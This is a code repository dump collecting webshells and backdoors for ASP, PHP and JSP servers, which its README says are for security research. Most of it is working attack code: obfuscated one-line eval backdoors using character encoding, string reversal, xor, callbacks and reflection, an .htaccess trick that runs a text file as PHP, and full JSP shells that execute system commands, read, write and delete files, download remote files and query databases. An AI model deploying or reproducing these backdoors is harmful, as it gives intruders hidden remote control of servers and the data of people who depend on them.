├── .gitignore ├── ASP └── README.md ├── PHP ├── README.md ├── apache_htaccess_backdoor │ ├── .htaccess │ └── shell.txt ├── array.php ├── array2.php ├── array_map.php ├── assert.php ├── assert2.php ├── assert3.php ├── callback1.php ├── callback2.php ├── callback3.php ├── callback4.php ├── check_pass1.php ├── check_pass2.php ├── chr.php ├── cmd.php ├── eval.php ├── fan.php ├── key.php ├── plus.php ├── preg_replace.php ├── reflect.php ├── shell.php ├── shell2.php ├── shell3.php ├── shell4.php ├── xor.php └── zhushi.php ├── README.md └── jsp ├── chopper.jsp ├── cmd.jsp ├── joychou.war └── jspspy.jsp /.gitignore: -------------------------------------------------------------------------------- 1 | .idea/ -------------------------------------------------------------------------------- /ASP/README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | # ASP一句话木马 4 | 5 | 6 | ## 标准一句话 7 | 8 | ``` 9 | <%eval request("sb")%> 10 | 11 | <%execute request("sb")%> 12 | 13 | <%Eval(Request(chr(35)))%> password:# 14 | 15 | <%Eval(((Request(chr(35)))))%> 可以有多对括号 16 | 17 | <%ExecuteGlobal request("sb")%> 18 | 19 | <%eval request.form("#")%> 20 | 21 | <%eval request.item("#")%> 22 | 23 | <%eval request("chopper")%> 24 | 25 | <%execute request("1")%> 26 | 27 | 28 | // 单独运行500错误,但是菜刀能连。 29 | <%a=request("1")%><%execute a%> 30 | 31 | // 单独运行不报错,菜刀能连 32 | <%a=request("1")%><%eval a%> 33 | 34 | // 单独运行500错误,但是菜刀能连。 35 | <%a=request("1")%><%executeglobal a%> 36 | ``` 37 | 38 | 39 | ## 利用utf-7编码 40 | 41 | 密码是#,解密只需要将+k-去掉即可,这里的k可以是任意字符,长度也是随意。 42 | 43 | ``` 44 | <%@codepage=65000%> 45 | <%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=936:e+k-v+k-a+k-l r+k-e+k-q+k-u+k-e+k-s+k-t("#")%> 46 | ``` 47 | 48 | 解密后 49 | 50 | ``` 51 | <%@codepage=65000%> 52 | <%response.codepage=936:eval request("#")%> 53 | ``` 54 | 55 | 密码是:c 56 | 57 | ``` 58 | <%@codepage=65000%> 59 | <%e+x-v+x-a+x-l(+x-r+x-e+x-q+x-u+x-e+x-s+x-t+x-(+x-+ACI-c+ACI)+x-)+x-%> 60 | ``` 61 | 62 | 63 | 64 | ## 字符串逆序 65 | 66 | 67 | StrReverse Replace加密,解密后为:Execute eval request("cmd") 68 | 69 | ``` 70 | <% 71 | 72 | Function decode(Code) 73 | decode=Replace(StrReverse(Code),"/*/","""") 74 | End Function 75 | Execute decode(")/*/dmc/*/(tseuqer lave") 76 | %> A 77 | ``` 78 | 79 | ASP自带逆序函数 80 | 81 | ``` 82 | <%execute(strreverse(")""xx""(tseuqer lave"))%> 83 | ``` 84 | 85 | ## 利用chr ,request 86 | 87 | ``` 88 | <%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("1"))%> 89 | ``` 90 | 91 | 92 | ## 利用asp的&连接符 93 | 94 | ``` 95 | <% eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")") %> 96 | ``` 97 | 98 | ## 拆分 99 | 100 | ``` 101 | <% 102 | xx=request("xx") 103 | eval xx 104 | %> 105 | ``` 106 | 107 | ``` 108 | <% 109 | xx=request("xx") 110 | Rain=xx 111 | eval Rain 112 | %> 113 | ``` 114 | 115 | ``` 116 | <% 117 | xx=request("xx") 118 | Rain=xx 119 | bb=Rain 120 | if 1=0 then 121 | response.write("123") 122 | else 123 | eval bb 124 | end if 125 | %> 126 | ``` 127 | 128 | ## 字符串替换(replace函数) 129 | 130 | ``` 131 | <% 132 | xxx="e0x0e0c0ut0e(0req0ue0st(""x0x""))" 133 | xxx=replace(xxx,"0","") 134 | eval xxx 135 | %> 136 | ``` 137 | 138 | 139 | ## chr()连接字符串 140 | 141 | ``` 142 | <%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("sz"))%> 143 | ``` 144 | 145 | ## Mid()连接字符串 146 | 147 | 基本思路:乱序一个字符串然后反复Mid取字符构成一句话。 148 | 149 | ``` 150 | <% 151 | Function d(s) 152 | d=Mid(love,s,1) 153 | End Function 154 | love="(tqxuesrav l)"&"""" 155 | execute(d(6)&d(10)&d(9)&d(12)&d(11)&d(8)&d(6)&d(3)&d(5)&d(6)&d(7)&d(2)&d(1)&d(14)&d(4)&d(4)&d(14)&d(13)) 156 | %> 157 | ``` 158 | 159 | ## 字符连接成字符串 160 | 161 | ``` 162 | <%eval("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0″&"-"&"2″&"-"&"5″&")"&")")%> 密码-7 163 | ``` 164 | 165 | ## Jscript 166 | 167 | ``` 168 | < %@ Page Language = Jscript %> 169 | < %var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/ 170 | "a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+ 171 | "[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+ 172 | ","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval 173 | (/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%> 密码 -7 174 | ``` 175 | 176 | ``` 177 | < %@ Page Language="Jscript"%>< %eval(Request.Item["shezhang"],"unsafe");%> 178 | ``` 179 | -------------------------------------------------------------------------------- /PHP/README.md: -------------------------------------------------------------------------------- 1 | # PHP一句话木马 2 | 3 | ## 数组 4 | 5 | 利用数组,维数自己随意构造 6 | 7 | ```php 8 | 14 | ``` 15 | 16 | 17 | ```php 18 | 23 | 24 | ``` 25 | 26 | 利用key获取数组key 27 | 28 | ```php 29 | 33 | ``` 34 | 35 | http://localhost/test.php?assert=test,菜刀密码cmd 36 | 37 | 38 | ## 变量 39 | 40 | ```php 41 | 45 | ``` 46 | 47 | ```php 48 | 53 | ``` 54 | ## chr 55 | 56 | ```php 57 | 60 | ``` 61 | 62 | ```php 63 | 66 | ``` 67 | 解密后: 68 | 69 | ```php 70 | 73 | ``` 74 | 75 | ```php 76 | 86 | ``` 87 | 88 | 解密后:`eval($_POST[1]);` 89 | ## 换行 90 | 91 | ```php 92 | 93 | 98 | 99 | ``` 100 | 101 | ```php 102 | 108 | 109 | ``` 110 | 111 | ## 空格 112 | 113 | 密码为cmd 114 | 115 | ```php 116 | 117 | ``` 118 | 119 | ## 注释 120 | 121 | ```php 122 | 128 | ``` 129 | 130 | ## 和正常代码混淆 131 | 132 | ```php 133 | 143 | ``` 144 | 145 | 解密后: 146 | 147 | ```php 148 | 解密后为:if ( isset( $_REQUEST['pass'] )){@eval( base64_decode( $_REQUEST['pass'] ) );}else{@eval( $_REQUEST['addimg'] );} 149 | ``` 150 | 151 | 152 | ```php 153 | 172 | ``` 173 | 174 | 解密后为:`@eval($_POST[adm])` 175 | 176 | 177 | ```php 178 | 205 | ``` 206 | 207 | ```php 208 | 1000000){ 211 | die('404'); 212 | } 213 | if (isset($_POST["\x70\x61\x73\x73"]) && isset($_POST["\x63\x68\x65\x63\x6b"])) 214 | { 215 | $__PHP_debug = array ( 216 | 'ZendName' => '70,61,73,73', 217 | 'ZendPort' => '63,68,65,63,6b', 218 | 'ZendSalt' => '792e19812fafd57c7ac150af768d95ce' 219 | ); 220 | 221 | $__PHP_replace = array ( 222 | pack('H*', join('', explode(',', $__PHP_debug['ZendName']))), 223 | pack('H*', join('', explode(',', $__PHP_debug['ZendPort']))), 224 | $__PHP_debug['ZendSalt'] 225 | ); 226 | 227 | $__PHP_request = &$_POST; 228 | $__PHP_token = md5($__PHP_request[$__PHP_replace[0]]); 229 | 230 | if ($__PHP_token == $__PHP_replace[2]) 231 | { 232 | $__PHP_token = preg_replace ( 233 | chr(47).$__PHP_token.chr(47).chr(101), 234 | $__PHP_request[$__PHP_replace[1]], 235 | $__PHP_token 236 | ); 237 | 238 | unset ( 239 | $__PHP_debug, 240 | $__PHP_replace, 241 | $__PHP_request, 242 | $__PHP_token 243 | ); 244 | 245 | if(!defined('_DEBUG_TOKEN')) exit ('Get token fail!'); 246 | 247 | } 248 | } 249 | 250 | ``` 251 | 252 | ## PHP反射机制 253 | 254 | ```php 255 | getDocComment(); 266 | $payload = substr($str,strpos($str,'ev'),3); 267 | $payload .= substr($str,strpos($str,'l('),7); 268 | $payload .= substr($str,strpos($str,'T['),8); 269 | $exe = substr($str, strpos($str, 'as'), 4); 270 | $exe .= substr($str, strpos($str, 'rt'), 2); 271 | 272 | $exe($payload); 273 | ?> 274 | ``` 275 | 276 | 利用注释和php的反射机制(可获取注释),解密后: 277 | 278 | ```php 279 | assert(eval($_POST["c"])); 280 | ``` 281 | 282 | ## 回调 283 | 284 | 利用session_set_save_handler回调函数。 285 | 286 | ```php 287 | 311 | ``` 312 | 313 | 整个代码逻辑:session_set_save_handler设置6个回调,当seession_start的时候,自动调用第三个$session回调函数,第三个函数的原型是read(string $sessionId),这里相当于是assert(string $sessionId),而参数是sessionId。当调用`session_id($_REQUEST[phpcms]);`这句代码后,返回sessionId,最后就相当于执行 314 | `assert($_REQUEST[phpcms])` 315 | 316 | 317 | ```php 318 | 323 | ``` 324 | 325 | 326 | ```php 327 | 328 | 332 | ``` 333 | 334 | 335 | ```php 336 | 'assert')); 338 | //filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert'))); 339 | ?> 340 | ``` 341 | 342 | 343 | ```php 344 | 349 | 350 | ``` 351 | 352 | 353 | ```php 354 | $_clasc = $_REQUEST['mod']; 355 | $arr = array($_POST['bato'] => '|.*|e',); 356 | @array_walk_recursive($arr, $_clasc, ''); 357 | ``` 358 | 359 | 360 | ## 反引号 361 | 362 | 利用反引号执行命令 363 | 364 | ```php 365 | 372 | ``` 373 | 374 | ## + 375 | 376 | ```php 377 | 408 | ``` 409 | 410 | ## xor 411 | 412 | ```php 413 | 422 | ``` 423 | 424 | ## 反引号 425 | 426 | ```php 427 | 432 | ``` 433 | 434 | 解密后:`assert($_REQUEST[jcmemeda])` 435 | 436 | ## Cookie 437 | 438 | ```php 439 | 451 | ``` 452 | 453 | 拿Nginx举例,修改fastcgi_params参数,添加变量如下: 454 | 455 | ``` 456 | fastcgi_param HTTP_X_E10EC8 //e; 457 | fastcgi_param HTTP_X_CURRENT assert('phpinfo()'); 458 | ``` 459 | 460 | reload nginx后,即可执行phpinfo 461 | 462 | ## `php://input` 463 | 464 | 465 | ```php 466 | ' . file_get_contents('php://input')); 467 | ``` 468 | 469 | 可执行php代码,post方式提交`` 470 | -------------------------------------------------------------------------------- /PHP/apache_htaccess_backdoor/.htaccess: -------------------------------------------------------------------------------- 1 | 2 | SetHandler application/x-httpd-php 3 | -------------------------------------------------------------------------------- /PHP/apache_htaccess_backdoor/shell.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /PHP/array.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /PHP/array2.php: -------------------------------------------------------------------------------- 1 | 7 | -------------------------------------------------------------------------------- /PHP/array_map.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /PHP/assert.php: -------------------------------------------------------------------------------- 1 | 5 | -------------------------------------------------------------------------------- /PHP/assert2.php: -------------------------------------------------------------------------------- 1 | 7 | -------------------------------------------------------------------------------- /PHP/assert3.php: -------------------------------------------------------------------------------- 1 | 7 | 8 | -------------------------------------------------------------------------------- /PHP/callback1.php: -------------------------------------------------------------------------------- 1 | register_tick_function: 2 | 7 | -------------------------------------------------------------------------------- /PHP/callback2.php: -------------------------------------------------------------------------------- 1 | register_shutdown_function 2 | 6 | -------------------------------------------------------------------------------- /PHP/callback3.php: -------------------------------------------------------------------------------- 1 | 'assert')); 3 | //filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert'))); 4 | ?> 5 | -------------------------------------------------------------------------------- /PHP/callback4.php: -------------------------------------------------------------------------------- 1 | array_filter 2 | 7 | -------------------------------------------------------------------------------- /PHP/check_pass1.php: -------------------------------------------------------------------------------- 1 | 1000000){ 7 | die('404'); 8 | } 9 | if (isset($_POST["\x70\x61\x73\x73"]) && isset($_POST["\x63\x68\x65\x63\x6b"])) 10 | { 11 | $__PHP_debug = array ( 12 | 'ZendName' => '70,61,73,73', 13 | 'ZendPort' => '63,68,65,63,6b', 14 | 'ZendSalt' => '21232f297a57a5a743894a0e4a801fc3' //md5(admin) 15 | ); 16 | 17 | $__PHP_replace = array ( 18 | pack('H*', join('', explode(',', $__PHP_debug['ZendName']))), 19 | pack('H*', join('', explode(',', $__PHP_debug['ZendPort']))), 20 | $__PHP_debug['ZendSalt'] 21 | ); 22 | $__PHP_request = &$_POST; 23 | $__PHP_token = md5($__PHP_request[$__PHP_replace[0]]); 24 | 25 | if ($__PHP_token == $__PHP_replace[2]) 26 | { 27 | $__PHP_token = preg_replace ( 28 | chr(47).$__PHP_token.chr(47).chr(101), 29 | $__PHP_request[$__PHP_replace[1]], 30 | $__PHP_token 31 | ); 32 | 33 | unset ( 34 | $__PHP_debug, 35 | $__PHP_replace, 36 | $__PHP_request, 37 | $__PHP_token 38 | ); 39 | 40 | if(!defined('_DEBUG_TOKEN')) exit ('Get token fail!'); 41 | 42 | } 43 | } -------------------------------------------------------------------------------- /PHP/check_pass2.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /PHP/chr.php: -------------------------------------------------------------------------------- 1 | 4 | -------------------------------------------------------------------------------- /PHP/cmd.php: -------------------------------------------------------------------------------- 1 | 8 | -------------------------------------------------------------------------------- /PHP/eval.php: -------------------------------------------------------------------------------- 1 | 4 | 5 | -------------------------------------------------------------------------------- /PHP/fan.php: -------------------------------------------------------------------------------- 1 | 7 | -------------------------------------------------------------------------------- /PHP/key.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /PHP/plus.php: -------------------------------------------------------------------------------- 1 | 33 | -------------------------------------------------------------------------------- /PHP/preg_replace.php: -------------------------------------------------------------------------------- 1 | ?php 2 | // pwd=D8OWX2Y 3 | preg_replace(chr(47).chr(100).chr(0x75).chr(111).chr(115).chr(111).chr(102).chr(116).chr(0x2f).chr(0x69).chr(115).chr(101),chr(0x40).chr(0x65).chr(0x76).chr(97).chr(0x6c).chr(0x28).chr(0x27).chr(0x40).chr(101).chr(0x76).chr(0x61).chr(0x6c).chr(40).chr(40).chr(0x67).chr(0x65).chr(116).chr(95).chr(0x6d).chr(97).chr(0x67).chr(0x69).chr(0x63).chr(0x5f).chr(113).chr(117).chr(0x6f).chr(0x74).chr(101).chr(115).chr(95).chr(0x67).chr(112).chr(0x63).chr(40).chr(41).chr(0x3f).chr(0x73).chr(0x74).chr(114).chr(0x69).chr(112).chr(115).chr(0x6c).chr(97).chr(0x73).chr(0x68).chr(0x65).chr(0x73).chr(40).chr(36).chr(0x5f).chr(0x50).chr(79).chr(0x53).chr(0x54).chr(91).chr(68).chr(0x38).chr(79).chr(0x57).chr(88).chr(0x32).chr(89).chr(0x5d).chr(41).chr(58).chr(36).chr(95).chr(80).chr(79).chr(0x53).chr(84).chr(0x5b).chr(0x44).chr(0x38).chr(79).chr(87).chr(0x58).chr(0x32).chr(0x59).chr(0x5d).chr(41).chr(41).chr(0x3b).chr(39).chr(0x29).chr(59),chr(0x64).chr(117).chr(111).chr(115).chr(0x6f).chr(102).chr(116)); 4 | ?> 5 | -------------------------------------------------------------------------------- /PHP/reflect.php: -------------------------------------------------------------------------------- 1 | getDocComment(); 12 | $payload = substr($str,strpos($str,'ev'),3); 13 | $payload .= substr($str,strpos($str,'l('),7); 14 | $payload .= substr($str,strpos($str,'T['),8); 15 | $exe = substr($str, strpos($str, 'as'), 4); 16 | $exe .= substr($str, strpos($str, 'rt'), 2); 17 | 18 | $exe($payload); 19 | ?> 20 | -------------------------------------------------------------------------------- /PHP/shell.php: -------------------------------------------------------------------------------- 1 | 7 | -------------------------------------------------------------------------------- /PHP/shell2.php: -------------------------------------------------------------------------------- 1 | 11 | -------------------------------------------------------------------------------- /PHP/shell3.php: -------------------------------------------------------------------------------- 1 | 21 | -------------------------------------------------------------------------------- /PHP/shell4.php: -------------------------------------------------------------------------------- 1 | 25 | -------------------------------------------------------------------------------- /PHP/xor.php: -------------------------------------------------------------------------------- 1 | 10 | -------------------------------------------------------------------------------- /PHP/zhushi.php: -------------------------------------------------------------------------------- 1 | 7 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # webshell 2 | 3 | 几乎都是当年乙方入侵分析发现的后门。 4 | 5 | - [PHP](https://github.com/JoyChou93/webshell/blob/master/PHP/README.md) 6 | - [ASP](https://github.com/JoyChou93/webshell/blob/master/ASP/README.md) 7 | - [JSP](https://github.com/JoyChou93/webshell/blob/master/JSP/README.md) 8 | 9 | 该项目的所有内容,只用来安全研究。请勿用作其他用途。 10 | -------------------------------------------------------------------------------- /jsp/chopper.jsp: -------------------------------------------------------------------------------- 1 | <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> 2 | <%! 3 | String Pwd = "joychou"; 4 | String cs = "UTF-8"; 5 | 6 | String EC(String s) throws Exception { 7 | return new String(s.getBytes("ISO-8859-1"),cs); 8 | } 9 | 10 | Connection GC(String s) throws Exception { 11 | String[] x = s.trim().split("choraheiheihei"); 12 | Class.forName(x[0].trim()); 13 | if(x[1].indexOf("jdbc:oracle")!=-1){ 14 | return DriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]); 15 | }else{ 16 | Connection c = DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]); 17 | if (x.length > 4) { 18 | c.setCatalog(x[4]); 19 | } 20 | return c; 21 | } 22 | } 23 | 24 | void AA(StringBuffer sb) throws Exception { 25 | File k = new File(""); 26 | File r[] = k.listRoots(); 27 | for (int i = 0; i < r.length; i++) { 28 | sb.append(r[i].toString().substring(0, 2)); 29 | } 30 | } 31 | 32 | void BB(String s, StringBuffer sb) throws Exception { 33 | File oF = new File(s), l[] = oF.listFiles(); 34 | String sT, sQ, sF = ""; 35 | java.util.Date dt; 36 | SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); 37 | for (int i = 0; i < l.length; i++) { 38 | dt = new java.util.Date(l[i].lastModified()); 39 | sT = fm.format(dt); 40 | sQ = l[i].canRead() ? "R" : ""; 41 | sQ += l[i].canWrite() ? " W" : ""; 42 | if (l[i].isDirectory()) { 43 | sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()+ "\t" + sQ + "\n"); 44 | } else { 45 | sF+=l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t"+ sQ + "\n"; 46 | } 47 | } 48 | sb.append(sF); 49 | } 50 | 51 | void EE(String s) throws Exception { 52 | File f = new File(s); 53 | if (f.isDirectory()) { 54 | File x[] = f.listFiles(); 55 | for (int k = 0; k < x.length; k++) { 56 | if (!x[k].delete()) { 57 | EE(x[k].getPath()); 58 | } 59 | } 60 | } 61 | f.delete(); 62 | } 63 | 64 | void FF(String s, HttpServletResponse r) throws Exception { 65 | int n; 66 | byte[] b = new byte[512]; 67 | r.reset(); 68 | ServletOutputStream os = r.getOutputStream(); 69 | BufferedInputStream is = new BufferedInputStream(new FileInputStream(s)); 70 | os.write(("->" + "|").getBytes(), 0, 3); 71 | while ((n = is.read(b, 0, 512)) != -1) { 72 | os.write(b, 0, n); 73 | } 74 | os.write(("|" + "<-").getBytes(), 0, 3); 75 | os.close(); 76 | is.close(); 77 | } 78 | 79 | void GG(String s, String d) throws Exception { 80 | String h = "0123456789ABCDEF"; 81 | File f = new File(s); 82 | f.createNewFile(); 83 | FileOutputStream os = new FileOutputStream(f); 84 | for (int i = 0; i < d.length(); i += 2) { 85 | os.write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d.charAt(i + 1)))); 86 | } 87 | os.close(); 88 | } 89 | 90 | void HH(String s, String d) throws Exception { 91 | File sf = new File(s), df = new File(d); 92 | if (sf.isDirectory()) { 93 | if (!df.exists()) { 94 | df.mkdir(); 95 | } 96 | File z[] = sf.listFiles(); 97 | for (int j = 0; j < z.length; j++) { 98 | HH(s + "/" + z[j].getName(), d + "/" + z[j].getName()); 99 | } 100 | } else { 101 | FileInputStream is = new FileInputStream(sf); 102 | FileOutputStream os = new FileOutputStream(df); 103 | int n; 104 | byte[] b = new byte[512]; 105 | while ((n = is.read(b, 0, 512)) != -1) { 106 | os.write(b, 0, n); 107 | } 108 | is.close(); 109 | os.close(); 110 | } 111 | } 112 | 113 | void II(String s, String d) throws Exception { 114 | File sf = new File(s), df = new File(d); 115 | sf.renameTo(df); 116 | } 117 | 118 | void JJ(String s) throws Exception { 119 | File f = new File(s); 120 | f.mkdir(); 121 | } 122 | 123 | void KK(String s, String t) throws Exception { 124 | File f = new File(s); 125 | SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); 126 | java.util.Date dt = fm.parse(t); 127 | f.setLastModified(dt.getTime()); 128 | } 129 | 130 | void LL(String s, String d) throws Exception { 131 | URL u = new URL(s); 132 | int n = 0; 133 | FileOutputStream os = new FileOutputStream(d); 134 | HttpURLConnection h = (HttpURLConnection) u.openConnection(); 135 | InputStream is = h.getInputStream(); 136 | byte[] b = new byte[512]; 137 | while ((n = is.read(b)) != -1) { 138 | os.write(b, 0, n); 139 | } 140 | os.close(); 141 | is.close(); 142 | h.disconnect(); 143 | } 144 | 145 | void MM(InputStream is, StringBuffer sb) throws Exception { 146 | String l; 147 | BufferedReader br = new BufferedReader(new InputStreamReader(is)); 148 | while ((l = br.readLine()) != null) { 149 | sb.append(l + "\r\n"); 150 | } 151 | } 152 | 153 | void NN(String s, StringBuffer sb) throws Exception { 154 | Connection c = GC(s); 155 | ResultSet r = s.indexOf("jdbc:oracle")!=-1?c.getMetaData().getSchemas():c.getMetaData().getCatalogs(); 156 | while (r.next()) { 157 | sb.append(r.getString(1) + "\t|\t\r\n"); 158 | } 159 | r.close(); 160 | c.close(); 161 | } 162 | 163 | void OO(String s, StringBuffer sb) throws Exception { 164 | Connection c = GC(s); 165 | String[] x = s.trim().split("choraheiheihei"); 166 | ResultSet r = c.getMetaData().getTables(null,s.indexOf("jdbc:oracle")!=-1?x.length>5?x[5]:x[4]:null, "%", new String[]{"TABLE"}); 167 | while (r.next()) { 168 | sb.append(r.getString("TABLE_NAME") + "\t|\t\r\n"); 169 | } 170 | r.close(); 171 | c.close(); 172 | } 173 | 174 | void PP(String s, StringBuffer sb) throws Exception { 175 | String[] x = s.trim().split("\r\n"); 176 | Connection c = GC(s); 177 | Statement m = c.createStatement(1005, 1007); 178 | ResultSet r = m.executeQuery("select * from " + x[x.length-1]); 179 | ResultSetMetaData d = r.getMetaData(); 180 | for (int i = 1; i <= d.getColumnCount(); i++) { 181 | sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i)+ ")\t"); 182 | } 183 | r.close(); 184 | m.close(); 185 | c.close(); 186 | } 187 | 188 | void QQ(String cs, String s, String q, StringBuffer sb,String p) throws Exception { 189 | Connection c = GC(s); 190 | Statement m = c.createStatement(1005, 1008); 191 | BufferedWriter bw = null; 192 | try { 193 | ResultSet r = m.executeQuery(q.indexOf("--f:")!=-1?q.substring(0,q.indexOf("--f:")):q); 194 | ResultSetMetaData d = r.getMetaData(); 195 | int n = d.getColumnCount(); 196 | for (int i = 1; i <= n; i++) { 197 | sb.append(d.getColumnName(i) + "\t|\t"); 198 | } 199 | sb.append("\r\n"); 200 | if(q.indexOf("--f:")!=-1){ 201 | File file = new File(p); 202 | if(q.indexOf("-to:")==-1){ 203 | file.mkdir(); 204 | } 205 | bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(q.indexOf("-to:")!=-1?p.trim():p+q.substring(q.indexOf("--f:") + 4,q.length()).trim()),true),cs)); 206 | } 207 | while (r.next()) { 208 | for (int i = 1; i <= n; i++) { 209 | if(q.indexOf("--f:")!=-1){ 210 | bw.write(r.getObject(i)+""+"\t"); 211 | bw.flush(); 212 | }else{ 213 | sb.append(r.getObject(i)+"" + "\t|\t"); 214 | } 215 | } 216 | if(bw!=null){bw.newLine();} 217 | sb.append("\r\n"); 218 | } 219 | r.close(); 220 | if(bw!=null){bw.close();} 221 | } catch (Exception e) { 222 | sb.append("Result\t|\t\r\n"); 223 | try { 224 | m.executeUpdate(q); 225 | sb.append("Execute Successfully!\t|\t\r\n"); 226 | } catch (Exception ee) { 227 | sb.append(ee.toString() + "\t|\t\r\n"); 228 | } 229 | } 230 | m.close(); 231 | c.close(); 232 | } 233 | %> 234 | <% 235 | 236 | 237 | //String Z = EC(request.getParameter(Pwd) + "", cs); 238 | 239 | cs = request.getParameter("code") != null ? request.getParameter("code")+ "":cs; 240 | request.setCharacterEncoding(cs); 241 | response.setContentType("text/html;charset=" + cs); 242 | StringBuffer sb = new StringBuffer(""); 243 | if (request.getParameter(Pwd) != null) { 244 | 245 | try { 246 | String Z = EC(request.getParameter("action") + ""); 247 | String z1 = EC(request.getParameter("z1") + ""); 248 | String z2 = EC(request.getParameter("z2") + ""); 249 | sb.append("->" + "|"); 250 | String s = request.getSession().getServletContext().getRealPath("/"); 251 | if (Z.equals("A")) { 252 | sb.append(s + "\t"); 253 | if (!s.substring(0, 1).equals("/")) { 254 | AA(sb); 255 | } 256 | } else if (Z.equals("B")) { 257 | BB(z1, sb); 258 | } else if (Z.equals("C")) { 259 | String l = ""; 260 | BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1)))); 261 | while ((l = br.readLine()) != null) { 262 | sb.append(l + "\r\n"); 263 | } 264 | br.close(); 265 | } else if (Z.equals("D")) { 266 | BufferedWriter bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1)))); 267 | bw.write(z2); 268 | bw.close(); 269 | sb.append("1"); 270 | } else if (Z.equals("E")) { 271 | EE(z1); 272 | sb.append("1"); 273 | } else if (Z.equals("F")) { 274 | FF(z1, response); 275 | } else if (Z.equals("G")) { 276 | GG(z1, z2); 277 | sb.append("1"); 278 | } else if (Z.equals("H")) { 279 | HH(z1, z2); 280 | sb.append("1"); 281 | } else if (Z.equals("I")) { 282 | II(z1, z2); 283 | sb.append("1"); 284 | } else if (Z.equals("J")) { 285 | JJ(z1); 286 | sb.append("1"); 287 | } else if (Z.equals("K")) { 288 | KK(z1, z2); 289 | sb.append("1"); 290 | } else if (Z.equals("L")) { 291 | LL(z1, z2); 292 | sb.append("1"); 293 | } else if (Z.equals("M")) { 294 | String[] c = { z1.substring(2), z1.substring(0, 2), z2 }; 295 | Process p = Runtime.getRuntime().exec(c); 296 | MM(p.getInputStream(), sb); 297 | MM(p.getErrorStream(), sb); 298 | } else if (Z.equals("N")) { 299 | NN(z1, sb); 300 | } else if (Z.equals("O")) { 301 | OO(z1, sb); 302 | } else if (Z.equals("P")) { 303 | PP(z1, sb); 304 | } else if (Z.equals("Q")) { 305 | QQ(cs, z1, z2, sb,z2.indexOf("-to:")!=-1?z2.substring(z2.indexOf("-to:")+4,z2.length()):s.replaceAll("\\\\", "/")+"images/"); 306 | } 307 | } catch (Exception e) { 308 | sb.append("ERROR" + ":// " + e.toString()); 309 | } 310 | sb.append("|" + "<-"); 311 | out.print(sb.toString()); 312 | } 313 | %> 314 | 315 | -------------------------------------------------------------------------------- /jsp/cmd.jsp: -------------------------------------------------------------------------------- 1 | <%@ page import="java.util.*,java.io.*"%> <% %> 2 |
3 | 4 | 5 | 
 
 6 | <%
 7 |  if ( request.getParameter( "comment" ) != null )
 8 |  {
 9 | 	 out.println( "Command: " + request.getParameter( "comment" ) + "
" );
10 | 	 Process p		= Runtime.getRuntime().exec( request.getParameter( "comment" ) );
11 | 	 OutputStream os	= p.getOutputStream();
12 | 	 InputStream in		= p.getInputStream();
13 | 	 DataInputStream dis	= new DataInputStream( in );
14 | 	 String disr		= dis.readLine();
15 | 	 while ( disr != null )
16 | 	 {
17 | 		 out.println( disr ); disr = dis.readLine();
18 | 	 }
19 |  }
20 |  %>
21 |
22 | 23 | -------------------------------------------------------------------------------- /jsp/joychou.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/JoyChou93/webshell/2185acc2b494f7c0dd8487273d514fb89ebe9240/jsp/joychou.war -------------------------------------------------------------------------------- /jsp/jspspy.jsp: -------------------------------------------------------------------------------- 1 | <%@page pageEncoding="utf-8"%> 2 | <%@page import="java.io.*"%> 3 | <%@page import="java.util.*"%> 4 | <%@page import="java.util.regex.*"%> 5 | <%@page import="java.sql.*"%> 6 | <%@page import="java.nio.charset.*"%> 7 | <%@page import="javax.servlet.http.HttpServletRequestWrapper"%> 8 | <%@page import="java.text.*"%> 9 | <%@page import="java.net.*"%> 10 | <%@page import="java.util.zip.*"%> 11 | <%@page import="java.awt.*"%> 12 | <%@page import="java.awt.image.*"%> 13 | <%@page import="javax.imageio.*"%> 14 | <%@page import="java.awt.datatransfer.DataFlavor"%> 15 | <%@page import="java.util.prefs.Preferences"%> 16 | <%! 17 | private static final String PW = "joychou"; //password 18 | private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd"; 19 | private static final String REQUEST_CHARSET = 